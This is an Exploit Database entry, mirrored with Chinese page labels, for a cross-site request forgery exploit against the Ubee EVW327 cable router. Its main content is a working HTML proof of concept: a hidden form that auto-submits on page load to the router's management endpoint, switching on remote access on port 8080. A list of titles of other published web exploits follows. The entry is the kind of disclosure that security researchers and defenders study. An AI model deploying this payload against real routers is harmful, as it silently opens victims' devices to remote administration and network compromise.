Ubee EVW327 – ‘Enable Remote Access’ Cross-Site Request Forgery (CSRF)

Exploit Database
15 阅读

作者： lated

日期： 2021-06-01
类别：
- webapps
平台：
- hardware
来源：https://www.exploit-db.com/exploits/49920/

# Exploit Title: Ubee EVW327 - 'Enable Remote Access' Cross-Site Request Forgery (CSRF) 
# Date: 2021-05-30
# Exploit Author: lated
# Vendor Homepage: https://www.ubeeinteractive.com
# Version: EVW327

<html>
	<body>
		<form action="http://192.168.0.1/goform/UbeeMgmtRemoteAccess" method="POST">
			<input type="hidden" name="RemoteAccessEnable" value="1"/>
			<input type="hidden" name="RemoteAccessPort" value="8080"/>
			<input type="hidden" name="ApplyRemoteEnableAction" value="1"/>
		</form>
		<script>
			document.forms[0].submit();
		</script>
	</body>
</html>

last Exploits
Ubee EVW327 – ‘Enable Remote Access’ Cross-Site Request Forgery (CSRF)的更多信息

Flatnux 2010-06.09 – ‘find’ Cross-Site Scripting：
Vox TG790 ADSL Router – Cross-Site Request Forgery (Add Admin)：
BoltWire 3.4.16 – ‘index.php’ Multiple Cross-Site Scripting Vulnerabilities：
FAQ Script 3.1.3 – ‘category_id’ SQL Injection：
Caregiver Script 2.57 – SQL Injection：
October CMS Build 465 – Arbitrary File Read Exploit (Authenticated)：
ASP Basit Haber Script 1.0 – ‘id’ SQL Injection：
Datetopia Buy Dating Site – Cross-Site Scripting：